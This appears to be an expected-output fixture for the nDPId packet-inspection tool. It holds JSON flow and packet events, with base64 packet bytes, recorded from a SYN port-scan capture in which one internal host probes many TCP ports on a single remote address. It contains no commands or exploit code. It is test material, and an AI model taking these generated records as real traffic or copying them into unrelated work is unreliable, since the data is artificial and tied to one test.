+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsDY0AADEGCeasEAAIQA2GNIzSDSzdUoMYAAAAAGACCAAjYwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAss7AAADcGXcKsEAAIQA2GNIzSAq\/dUoMYAAAAAGACEAAl4AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN0AACkGGpasEAAIQA2GNIzSHvDdUoMYAAAAAGACCAARnwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPEAADIG0YGsEAAIQA2GNIzSwAjdUoMYAAAAAGACDABshgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsQU0AACwG2yWsEAAIQA2GNIzSC8XdUoMYAAAAAGACBAAoygAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAspwkAACcGemmsEAAIQA2GNIzSFGndUoMYAAAAAGACEAAUJgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsWZIAADsGs+CsEAAIQA2GNIzSCMvdUoMYAAAAAGACEAAfxAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fkAACkGIXmsEAAIQA2GNIzTFyXdU4MZAAAAAGACCAAZZwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsosMAADgGba+sEAAIQA2GNIzTBNLdU4MZAAAAAGACBAAvugAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsxwIAADEGUHCsEAAIQA2GNIzTFxvdU4MZAAAAAGACCAAZcQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsG2YAACoGAw2sEAAIQA2GNIzTG1\/dU4MZAAAAAGACDAARLQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsBP4AADoGCXWsEAAIQA2GNIzTatndU4MZAAAAAGACDADBsgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsCS8AACsGFESsEAAIQA2GNIzTBIDdU4MZAAAAAGACEAAkDAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE0AADQG4CWsEAAIQA2GNIzTxczdU4MZAAAAAGACBABuvwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGwAADgGhAasEAAIQA2GNIzTE4vdU4MZAAAAAGACBAAhAQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsvsAAADAGWbKsEAAIQA2GNIzTBCfdU4MZAAAAAGACBAAwZQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsu84AACgGZKSsEAAIQA2GNIzTW87dU4MZAAAAAGACBADYvQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAseXYAACgGpvysEAAIQA2GNIzTCT7dU4MZAAAAAGACBAArTgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBQAACUGm16sEAAIQA2GNIzTw1bdU4MZAAAAAGACCABtNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjIAADIG7ECsEAAIQA2GNIzTIc7dU4MZAAAAAGACDAAKvgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsmVUAADkGdh2sEAAIQA2GNIzTCHDdU4MZAAAAAGACCAAoHAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs4M4AADcGMKSsEAAIQA2GNIzT1xDdU4MZAAAAAGACEABRewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlYAADsGrxysEAAIQA2GNIzTFbPdU4MZAAAAAGACEAAS2QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTcAACYGtTusEAAIQA2GNIzTH1bdU4MZAAAAAGACDAANNgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 